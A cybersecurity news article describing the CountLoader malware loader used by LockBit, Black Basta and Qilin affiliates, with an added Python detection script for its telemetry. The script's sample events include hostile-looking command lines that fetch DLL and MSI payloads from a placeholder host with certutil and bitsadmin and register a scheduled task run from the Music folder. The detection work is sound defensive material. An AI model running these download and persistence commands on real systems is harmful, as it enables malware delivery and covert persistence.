CountLoader Broadens Russian Ransomware Operations With Multi-Version Malware Loader

A new malware loader named CountLoader has been discovered by cybersecurity researchers. It is being used by Russian ransomware groups to deliver post-exploitation tools such as Cobalt Strike, AdaptixC2, and the PureHVNC remote access trojan (RAT).

According to an analysis by Silent Push, CountLoader is being utilized by ransomware affiliates associated with the LockBit, Black Basta, and Qilin ransomware groups. The malware comes in three versions – .NET, PowerShell, and JavaScript – and is currently being used in a campaign targeting individuals in Ukraine through PDF-based phishing lures.

The PowerShell version of CountLoader was previously detected by Kaspersky being distributed using DeepSeek-related decoys to deceive users into installing it.

The attacks involving CountLoader have led to the deployment of an implant called BrowserVenom, which manipulates network traffic and collects data by forcing browsing instances through a proxy controlled by the threat actors.

Further investigation by Silent Push revealed that the JavaScript version of CountLoader is the most sophisticated, offering multiple methods for file downloading and executing malware binaries, as well as identifying a victim’s device based on Windows domain information.

CountLoader is capable of gathering system information, setting up persistence on the host by creating a scheduled task, connecting to a remote server for instructions, and downloading and running DLL and MSI installer payloads.

CountLoader’s developers have demonstrated advanced knowledge of the Windows operating system and of malware development, using LOLBins such as ‘certutil’ and ‘bitsadmin’ and implementing a generator that produces encrypted PowerShell commands.

An interesting feature of CountLoader is its use of the victim’s Music folder as a staging area for malware. The malware infrastructure consists of over 20 unique domains, facilitating the distribution of Cobalt Strike, AdaptixC2, and PureHVNC RAT.
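The behaviours described above (certutil/bitsadmin downloads, a scheduled task for persistence, and payloads staged under the victim’s Music folder) are all visible in process-creation telemetry. The following detection logic is an added example written for this article, not code from Silent Push or any vendor; the log events are constructed samples and the field names (`image`, `cmd`) are assumed to mirror Sysmon-style Image/CommandLine fields.

```python
import re

# Constructed sample process-creation events (not from the article).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -urlcache -split -f http://example.invalid/a.dll C:\Users\bob\Music\a.dll"},
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": r"bitsadmin /transfer job /download /priority high http://example.invalid/s.msi C:\Users\bob\Music\s.msi"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks /create /sc minute /mo 5 /tn Updater /tr "C:\Users\bob\Music\run.js"'},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -hashfile C:\temp\file.txt SHA256"},          # benign use
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r"schtasks /query /tn Backup"},                          # benign use
]

# A per-user Music directory appearing anywhere in the command line.
MUSIC_DIR = re.compile(r"\\Users\\[^\\]+\\Music\\", re.IGNORECASE)
URL = re.compile(r"https?://", re.IGNORECASE)
PAYLOAD_EXT = re.compile(r"\.(dll|msi|js|ps1|exe)\b", re.IGNORECASE)


def classify(event):
    """Return the detection tags that apply to one process-creation event."""
    exe = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmd"]
    low = cmd.lower()
    tags = []
    # LOLBin downloads: certutil's URL cache and bitsadmin's transfer job.
    if exe == "certutil.exe" and "urlcache" in low and URL.search(cmd):
        tags.append("lolbin_certutil_download")
    if exe == "bitsadmin.exe" and "/transfer" in low and URL.search(cmd):
        tags.append("lolbin_bitsadmin_download")
    # Persistence: a scheduled task whose action lives in the Music folder.
    if exe == "schtasks.exe" and "/create" in low and MUSIC_DIR.search(cmd):
        tags.append("schtask_runs_from_music")
    # Staging: any executable-type payload written to or run from Music.
    if MUSIC_DIR.search(cmd) and PAYLOAD_EXT.search(cmd):
        tags.append("payload_staged_in_music")
    return tags


def triage(events):
    """Keep only events that trigger at least one tag, for analyst review."""
    return [(e["cmd"], classify(e)) for e in events if classify(e)]
```

In practice the Music-folder check should be correlated with the download and scheduled-task tags on the same host within a short window, since a single match is weak evidence on its own.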

Recent campaigns distributing PureHVNC RAT have utilized the ClickFix social engineering tactic, with victims being lured through fake job offers to a phishing page where the trojan is deployed through a Rust-based loader.

The DomainTools Investigations team has separately mapped the interconnected nature of the Russian ransomware landscape, revealing threat actor movements across groups and the use of tools such as AnyDesk and Quick Assist.

DomainTools noted that brand allegiance is weak among these operators, with human capital being the primary asset. Trust relationships play a critical role, and individuals choose to work with people they know, regardless of the organization’s name.